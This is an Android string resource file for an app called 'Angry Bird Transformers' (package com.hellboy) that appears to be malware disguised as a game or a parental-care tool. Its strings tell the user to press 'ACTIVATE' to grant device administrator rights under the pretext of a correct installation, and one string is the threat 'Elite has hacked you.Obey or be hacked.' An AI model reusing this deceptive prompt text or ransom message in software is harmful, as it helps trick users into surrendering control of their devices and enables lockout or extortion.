<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Angry Bird Transformers</string>
    <string name="action_settings">Settings</string>
    <string name="sample_device_admin_description">"Angry Bird Transformers: A parent's care for child."</string>
    <string name="sample_device_admin">Angry Bird Transformers</string>
    <string name="device_admin_manager_message">To ensure the correct installation of Angry Bird Transformers, you must press the \"ACTIVATE\" button below.</string>
    <string name="toast_device_admin_setting_activated">Device admin setting activated successfully.</string>
    <string name="msg">Elite has hacked you.Obey or be hacked.</string>
    <string name="packagename">com.hellboy</string>
</resources>
